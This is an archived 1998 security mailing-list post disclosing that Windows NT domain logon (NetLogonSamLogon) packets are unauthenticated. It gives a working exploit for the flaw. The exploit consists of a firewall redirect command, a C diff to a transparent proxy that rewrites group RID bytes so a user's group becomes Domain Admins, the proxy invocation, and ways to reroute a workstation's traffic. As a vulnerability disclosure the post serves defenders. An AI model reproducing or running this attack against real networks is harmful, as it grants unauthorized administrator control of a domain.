---------- Forwarded message ---------- Date: Wed, 28 Jan 1998 13:35:00 +0000 From: Paul Ashton <paulat_private> To: NTBUGTRAQat_private Subject: Gaining Domain Admins access on LAN Quite a while ago when publishing the NT domain authentication protocol, I mentioned that the contents of the NetLogonSamLogon packet were unauthenticated. Recently I have been using Linux's transparent proxy support to do things like transparently filter outgoing access to port 80 through the Linux firewall via the junkbuster privacy program (cookie removal etc.) and the squid web cache. It turns out that changing the NetLogonSamLogon packet using transparent proxy support is trivial. No need to bother with recalculating TCP checksums etc. Here's what you need to do if you want to change your domain group DOMGRP1 (let's say it's RID 0x03F3) to Domain Admins, RID 0x0200. Get transproxy-0.3 from http://www.nlc.net.au/ Make sure your Linux kernel has been compiled with transparent proxy support. Install the following firewall rule:- ipfwadm -I -a accept -P tcp -D 0/0 139 -r 150 This will redirect attempts to connect to port 139 to the local port 150 Start the transparent proxy daemon on port 150 that will modify the contents of MS RPCs that go through it. Modify tproxy.c with the following diff: *** tproxy.c Wed Jan 28 14:17:31 1998 --- orgtproxy.c Mon Jan 26 20:14:46 1998 *************** *** 795,814 **** return; default: - { - int i; - unsigned char oldgroup[8] = {0xf3,0x03,0,0,7,0,0,0}; - unsigned char newgroup[8] = {0x00,0x02,0,0,7,0,0,0}; - - for (i = 0; i < read_len-8; i++) - if (!memcmp(headers+i, oldgroup, 8)) - memcpy(headers+i,newgroup,8); if (write(sock, headers, read_len) < 0) { syslog(LOG_WARNING, "write(client) failed: %m"); close(proxy); return; - } } break; } --- 795,805 ---- Compile and run ./tproxy -t -s 150 -r nobody pdchost 139 pdchost is the name or IP address of a PDC or BDC which you wish to authenticate to. Convince your workstation to send SMB TCP/139 stuff through your linux firewall. You can do this in various ways such as setting default routes, physically interposing the linux firewall between the workstation and the rest of the network, responding to netbios name queries using Samba, creating your own DHCP server, etc. For the purposes of this test I changed the IP address of the workstation and set the default route to be the Linux server. CTL-ALT-DEL and login as a user in DOMGRP1 and voila you now have domain admin rights. I don't think SMB signing will protect this because the connection to the RPC named pipe is done as a null session. But I haven't tried it. Run this at your own peril. The group substitution will change all occurrences of the listed 8 bytes (RID+attributes) anywhere in a TCP 139 packet. Paul
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:09 PDT